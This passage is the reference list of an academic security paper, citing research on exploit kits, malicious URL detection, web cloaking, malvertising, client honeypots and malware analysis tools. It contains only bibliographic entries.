[8] Zeeuwen K, Ripeanu M, Beznosov K. Improving malicious url re-evaluation scheduling through an empirical study of malware download centers. In: Proceedings of the 2011 Joint WICOW/AIRWeb Workshop on Web Quality. Hyderabad, India: ACM; 2011. p. 42–49.

[9] Champion N. At what cost? it pricing and the australia tax. The Parliament of the Commonwealth of Australia; 2013 Jul. (Report).

[10] Kotov V, Massacci F. Anatomy of exploit kits. In: Jürjens J, Livshits B, Scandariato R, editor. Engineering Secure Software and Systems; Lecture notes in computer science. Berlin: Springer; 2013. p. 181–196.

[11] Eshete B, Venkatakrishnan V. Webwinnow: leveraging exploit kit workflows to detect malicious urls. In: Proceedings of the 4th ACM Conference on Data and Application Security and Privacy. San Antonio (TX): ACM; Mar 3–5, 2014. p. 305–312.

[12] Wang G, Stokes JW, Herley C, et al. Detecting malicious landing pages in malware distribution networks. In: 43rd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN). Budapest, Hungary: IEEE; 2013. p. 1–11.

[13] SpiderLabsResearch. A peek into the lion's den – the magnitude [aka popads] exploit kit; 2014 Nov 19.

[14] Wu B, Davison BD. Cloaking and redirection: a preliminary study. In: First International Workshop on Adversarial Information Retrieval on the Web (AIRWeb). Chiba, Japan; 2005. p. 7–16.

[15] Wu B, Davison BD. Detecting semantic cloaking on the web. In: Proceedings of the 15th International Conference on World Wide Web. Edinburgh, Scotland: ACM; May 22–26, 2006. p. 819–828.

[16] Chellapilla K, Chickering DM. Improving cloaking detection using search query popularity and monetizability. In: Adversarial Information Retrieval on the Web – AIRWeb. Seattle; Aug 10, 2006. p. 17–23.

[17] Mansoori M, Welch I, Choo K-KR, et al. Application of hazop to the design of cyber security experiments. In: The 30th IEEE International Conference on Advanced Information Networking and Applications. Crans-Montana, Switzerland: IEEE; 2016.

[18] Winther R, Johnsen O-A, Gran BA. Security assessments of safety critical systems using HAZOPs. In: Voges U, editor. Computer Safety, Reliability and Security; Lecture Notes in Computer Science. Berlin: Springer; 2001. p. 14–24.

[19] Hansen KM, Wells L, Maier T. Hazop analysis of uml-based software architecture descriptions of safety-critical systems. In: Proceedings of NWUML. Turku, Finland; 2004.

[20] De Maio G, Kapravelos A, Shoshitaishvili Y, et al. Pexy: the other side of exploit kits. Egham: Springer; Jul 10–11, 2014. p. 132–151.

[21] Zarras A, Kapravelos A, Stringhini G, et al. The dark alleys of madison avenue: understanding malicious advertisements. In: Proceedings of the 2014 Conference on Internet Measurement Conference. Vancouver: ACM; Nov 5–7, 2014. p. 373–380.

[22] Nikiforakis N, Maggi F, Stringhini G, et al. Stranger danger: exploring the ecosystem of ad-based url shortening services. In: Proceedings of the 23rd International Conference on World Wide Web. Seoul, Republic of Korea: ACM; Apr 7–11, 2014. p. 51–62.

[23] Wang DY, Savage S, Voelker GM. Cloak and dagger: dynamics of web search cloaking. In: Proceedings of the 18th ACM conference on Computer and Communications Security. Chicago (IL): ACM; Oct 17–21, 2011. p. 477–490.

[24] Kerschbaum F. Simple cross-site attack prevention. In: SecureComm 2007. Third International Conference on Security and Privacy in Communications Networks and the Workshops. Nice, France: IEEE; Sep 17–21, 2007. p. 464–472.

[25] Mao Z, Li N, Molloy I. Defeating cross-site request forgery attacks with browser-enforced authenticity protection. Barbados: Springer; Feb 23–26, 2009. p. 238–255.

[26] Kirda E, Jovanovic N, Kruegel C, et al. Client-side cross-site scripting protection. Comput Security. 2009;28:592–604.

[27] Wang Y-M, Ma M. Detecting stealth web pages that use click-through cloaking. 2006. (Microsoft Research Technical Report, MSR-TR-2006-178).

[28] Anupam V, Mayer A, Nissim K, et al. On the security of pay-per-click and other web advertising schemes. J Comput Networks. 1999;31:1091–1100.

[29] Bitdefender. Multi-language ransomware mentions police to enforce payment; 2012.

[30] hphosts – freely downloadable community managed hosts file for ad and malware site blocking.

[31] Seifert C, Welch I, Komisarczuk P. Honeyc – the low-interaction client honeypot. In: Proceedings of the 2006 NZCSRCS. Waikato, New Zealand: Waikato University; 2006.

[32] Alvarez VM. Yara in a nutshell. In: yara-project: a malware identification and classification tool; 2012.

[33] Hartstein B. Jsunpack: an automatic javascript unpacker. In: ShmooCon convention; 2009.

[34] Kim H-G, Kim D-J, Cho S-J, et al. Efficient detection of malicious web pages using high-interaction client honeypots. J Inform Sci Eng. 2012;28(5):911–924.

[35] Mansoori M, Welch I, Fu Q. Yalih, yet another low interaction honeyclient. In: Proceedings of the Twelfth Australasian Information Security Conference. Auckland, New Zealand; 2014. p. 7–15.

[36] Mozilla. Rhino – open-source implementation of javascript engine; 2005.

[37] Dellaera A. Python low-interaction honeyclient; 2013.

[38] Nazario J. Phoneyc: a virtual client honeypot. In: Proceedings of the 2nd USENIX Conference on Large-scale Exploits and Emergent Threats: Botnets, Spyware, Worms, and More (1855682). Berkeley (CA): USENIX Association; 2009. p. 6–6.

[39] Baecher P, Koetter M. libemu-x86 shellcode detection and emulation library; 2007.

[40] Quintero B, Canto J, Martinez E, et al. Virustotal – free virus, malware and url online scanning service.

[41] Nazario J, Holz T. As the net churns: fast-flux botnet observations. In: 3rd International Conference on Malicious and Unwanted Software. Alexandria (VA): IEEE; 2008. p. 24–31.

[42] Zhou CV, Leckie C, Karunasekera S. Collaborative detection of fast flux phishing domains. J Networks. 2009;4(1):75–84.

[43] Lee JJ. Mechanize: stateful programmatic web browsing in python; 2010.

[44] Eriksson B, Barford P, Maggs B, et al. Posit: a lightweight approach for ip geolocation. ACM SIGMETRICS Performance Evaluation Review. 2012;40(2):2–11.

[45] Sood AK, Enbody RJ, Bansal R. Malware analysis – styx exploit pack: insidious design; 2013. (Report).

[46] Kolbitsch C, Livshits B, Zorn B, et al. Rozzle: de-cloaking internet malware. In: 2012 IEEE Symposium on Security and Privacy. San Francisco, Canada: IEEE; May 20–23 2012. p. 443–457.